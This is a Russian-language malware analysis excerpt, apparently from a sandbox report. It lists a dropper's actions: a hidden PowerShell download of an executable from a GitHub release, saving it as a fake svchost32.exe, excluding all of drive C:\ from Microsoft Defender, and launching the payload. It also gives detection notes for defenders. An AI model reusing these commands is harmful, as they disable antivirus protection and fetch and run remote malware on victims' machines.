Техническая информация
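- Загружает https://github.com/vortex-clan-community/archives/releases/download/1.0.0/3.exe и сохраняет как %windir%\svchost32.exe (имя имитирует системный svchost.exe; штатного файла svchost32.exe в Windows нет)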
- 'gi##ub.com':443
- DNS ASK gi##ub.com
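- '<SYSTEM32>\cmd.exe' /k powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'' (со скрытым окном) — команда добавляет весь диск C:\ в исключения Microsoft Defender, после чего файлы на нём не проверяются; изменение настроек фиксируется в журнале Defender (событие 5007).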
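- '<SYSTEM32>\cmd.exe' /k powershell.exe -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).DownloadFile('https://github.com/VorteX-Clan-Community/Archives/releases/download/1.0.0/3.exe','%WINDIR%\s...' (со скрытым окном) — здесь -exec bypass и -windo 1 — сокращённые формы параметров -ExecutionPolicy Bypass и -WindowStyle Hidden; правила обнаружения по командной строке должны учитывать такие сокращения.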
- '<SYSTEM32>\cmd.exe' /k start %WINDIR%\svchost32.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /k powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'
- '<SYSTEM32>\cmd.exe' /k powershell.exe -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).DownloadFile('https://github.com/VorteX-Clan-Community/Archives/releases/download/1.0.0/3.exe','%WINDIR%\s...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\'
- '<SYSTEM32>\cmd.exe' /k start %WINDIR%\svchost32.exe